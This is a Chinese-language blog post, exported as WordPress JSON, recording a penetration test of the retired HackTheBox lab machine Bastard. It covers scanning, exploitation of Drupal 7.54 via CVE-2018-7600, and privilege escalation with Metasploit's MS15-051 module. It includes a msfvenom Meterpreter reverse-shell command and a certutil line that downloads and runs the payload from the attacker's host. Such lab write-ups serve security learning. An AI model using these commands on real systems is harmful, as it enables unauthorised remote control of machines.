{"id":171,"date":"2024-11-13T10:47:01","date_gmt":"2024-11-13T02:47:01","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=171"},"modified":"2024-11-13T10:47:02","modified_gmt":"2024-11-13T02:47:02","slug":"171","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/171\/","title":{"rendered":"HTB\u9776\u673a Bastard \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.9<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.10.9 (10.10.10.9) 56(84) bytes of data.\n64 bytes from 10.10.10.9: icmp_seq=1 ttl=127 time=169 ms\n64 bytes from 10.10.10.9: icmp_seq=2 ttl=127 time=1137 ms\n64 bytes from 10.10.10.9: icmp_seq=3 ttl=127 time=168 ms\n64 bytes from 10.10.10.9: icmp_seq=4 ttl=127 time=169 ms\n\n--- 10.10.10.9 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3294ms\nrtt min\/avg\/max\/mdev = 168.337\/410.891\/1137.177\/419.321 ms, pipe 2<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u7684\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Fri Sep 20 09:22:04 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nAll 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Fri Sep 20 09:23:11 2024 -- 1 IP address (1 host up) scanned in 66.89 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\uff0c\u76f4\u63a5\u8fdb\u884cTCP<\/code>\u5168\u7aef\u53e3\u626b\u63cf\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Sep 20 09:30:49 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nNot shown: 65532 filtered tcp ports (no-response)\nPORT      STATE SERVICE VERSION\n80\/tcp    open  http    Microsoft IIS httpd 7.5\n|_http-server-header: Microsoft-IIS\/7.5\n|_http-title: Welcome to Bastard | Bastard\n| http-methods: \n|_  Potentially risky methods: TRACE\n| http-robots.txt: 36 disallowed entries (15 shown)\n| \/includes\/ \/misc\/ \/modules\/ \/profiles\/ \/scripts\/ \n| \/themes\/ \/CHANGELOG.txt \/cron.php \/INSTALL.mysql.txt \n| \/INSTALL.pgsql.txt \/INSTALL.sqlite.txt \/install.php \/INSTALL.txt \n|_\/LICENSE.txt \/MAINTAINERS.txt\n|_http-generator: Drupal 7 (http:\/\/drupal.org)\n135\/tcp   open  msrpc   Microsoft Windows RPC\n49154\/tcp open  msrpc   Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone|specialized\nRunning (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)\nOS CPE: cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_8.1 cpe:\/o:microsoft:windows_vista::- cpe:\/o:microsoft:windows_vista::sp1\nAggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   169.89 ms 10.10.14.1 (10.10.14.1)\n2   169.86 ms 10.10.10.9 (10.10.10.9)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Sep 20 09:33:17 2024 -- 1 IP address (1 host up) scanned in 147.90 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Sep 20 09:37:48 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nAll 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Fri Sep 20 09:38:55 2024 -- 1 IP address (1 host up) scanned in 67.18 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u5927\u81f4\u4e3aWindows 8<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/bastard.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u7f51\u7ad9\u4f7f\u7528\u4e86Drupal 7<\/code>\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u6846\u67b6\u3002\u8bbf\u95eerobots.txt<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u5c06\u8be5\u6587\u4ef6\u7684\u5185\u5bb9\u6574\u7406\u4e3a\u76ee\u5f55\u5b57\u5178\uff0c\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff0c\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n
# Dirsearch started Sat Sep 21 09:09:04 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/bastard.htb\/ -x 400,403,404 -e php,js,html,txt,zip,tar.gz,pcap -t 60 -w .\/robots.lst\n\n301   150B   http:\/\/bastard.htb\/modules    -> REDIRECTS TO: http:\/\/bastard.htb\/modules\/\n301   150B   http:\/\/bastard.htb\/scripts    -> REDIRECTS TO: http:\/\/bastard.htb\/scripts\/\n301   151B   http:\/\/bastard.htb\/includes    -> REDIRECTS TO: http:\/\/bastard.htb\/includes\/\n301   149B   http:\/\/bastard.htb\/themes    -> REDIRECTS TO: http:\/\/bastard.htb\/themes\/\n301   147B   http:\/\/bastard.htb\/misc    -> REDIRECTS TO: http:\/\/bastard.htb\/misc\/\n200     2KB  http:\/\/bastard.htb\/INSTALL.mysql.txt\n200     2KB  http:\/\/bastard.htb\/INSTALL.pgsql.txt\n301   151B   http:\/\/bastard.htb\/profiles    -> REDIRECTS TO: http:\/\/bastard.htb\/profiles\/\n200     1KB  http:\/\/bastard.htb\/INSTALL.sqlite.txt\n200    10KB  http:\/\/bastard.htb\/UPGRADE.txt\n200     9KB  http:\/\/bastard.htb\/MAINTAINERS.txt\n200    18KB  http:\/\/bastard.htb\/LICENSE.txt\n200    18KB  http:\/\/bastard.htb\/INSTALL.txt\n200    42B   http:\/\/bastard.htb\/xmlrpc.php\n200     7KB  http:\/\/bastard.htb\/user\/password\n200   108KB  http:\/\/bastard.htb\/CHANGELOG.txt\n200     3KB  http:\/\/bastard.htb\/install.php\n200     8KB  http:\/\/bastard.htb\/?q=user\/register\n200    13KB  http:\/\/bastard.htb\/?q=filter\/tips\n200     7KB  http:\/\/bastard.htb\/user\/login\n200     8KB  http:\/\/bastard.htb\/user\/register\n200     7KB  http:\/\/bastard.htb\/?q=user\/password\n200     7KB  http:\/\/bastard.htb\/?q=user\/login\n200     8KB  http:\/\/bastard.htb\/?q=comment\/reply\n200    13KB  http:\/\/bastard.htb\/filter\/tips<\/code><\/pre>\n
\u5c1d\u8bd5\u67e5\u770bCHANGELOG.txt<\/code>\uff0c\u53d1\u73b0Drupal<\/code>\u7684\u7248\u672c\u4e3av7.54<\/code>\uff0c\u76f4\u63a5\u67e5\u627e\u7b26\u5408\u6761\u4ef6\u7684\u6f0f\u6d1e\uff1a<\/p>\n
\"\"<\/p>\n
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code - CVE-2018-7602\nDrupal < 7.58 \/ < 8.3.9 \/ < 8.4.6 \/ < 8.5.1 - 'Drupalgeddon2' Remote Code Execution - CVE-2018-7600\nDrupal 7.x Module Services - Remote Code Execution - EDBID-41564<\/code><\/pre>\n
\u53d1\u73b0\u4e863<\/code>\u4e2a\u53ef\u7528\u7684\u6f0f\u6d1e\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u5bf9\u53d1\u73b0\u76843<\/code>\u4e2a\u6f0f\u6d1e\u8fdb\u884c\u9010\u4e00\u5c1d\u8bd5\uff0c\u53d1\u73b0CVE-2018-7600<\/code>\u653b\u51fb\u6210\u529f\uff1a<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u751f\u6210\u53cd\u5f39Shell\u7a0b\u5e8f\uff1a<\/p>\n
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o .\/reverse.exe<\/code><\/pre>\n
\u968f\u540e\u76f4\u63a5\u6253\u5f00Metasploit<\/code>\u672c\u5730\u76d1\u542c\uff0c\u5e76\u4f7f\u7528\u5982\u4e0bWindows CMD<\/code>\u547d\u4ee4\u4e0b\u8f7d\u5e76\u542f\u52a8\u6728\u9a6c\u7a0b\u5e8f\uff1a<\/p>\n
certutil -urlcache -split -f http:\/\/10.10.14.2\/reverse.exe C:inetpubdrupal-7.54reverse.exe\n.reverse.exe<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u5185\u6838\u6f0f\u6d1e\u63a2\u6d4b<\/h2>\n
\u6536\u5230Shell\u540e\uff0c\u4f7f\u7528post\/multi\/recon\/local_exploit_suggester<\/code>\u6a21\u5757\u5bf9\u9776\u673a\u5185\u6838\u6f0f\u6d1e\u8fdb\u884c\u68c0\u67e5\uff0c\u53d1\u73b0\u670912<\/code>\u4e2a\u6f0f\u6d1e\u6a21\u5757\u53ef\u7528\uff1a<\/p>\n
\"\"<\/p>\n
\u51b3\u5b9a\u76f4\u63a5\u4f7f\u7528MS15-051<\/code>\u6f0f\u6d1e\u8fdb\u884c\u63d0\u6743\u3002<\/p>\n
MS15-051\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u76f4\u63a5\u52a0\u8f7dMetasploit<\/code>\u6a21\u5757exploit\/windows\/local\/ms15_051_client_copy_image<\/code>\uff0c\u5e76\u8bbe\u7f6eSession ID<\/code>\u4e3a\u5f53\u524d\u4f1a\u8bddID<\/code>\uff1a<\/p>\n
set SESSION 4\nset LHOST 10.10.14.2\nset LPORT 4444\nrun<\/code><\/pre>\n
\"\"<\/p>\n
\u76f4\u63a5\u6267\u884crun<\/code>\u547d\u4ee4\u653b\u51fb\uff1a<\/p>\n
\"\"<\/p>\n
\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
\n
Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
\"\"<\/p>\n
\n
\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
\uff1a<\/strong><\/p>\n
\n
\n
\n
\n","protected":false},"excerpt":{"rendered":"
\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.9 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.9 (10.10.10.9) 56( …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-171","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=171"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171\/revisions"}],"predecessor-version":[{"id":172,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171\/revisions\/172"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=171"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=171"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}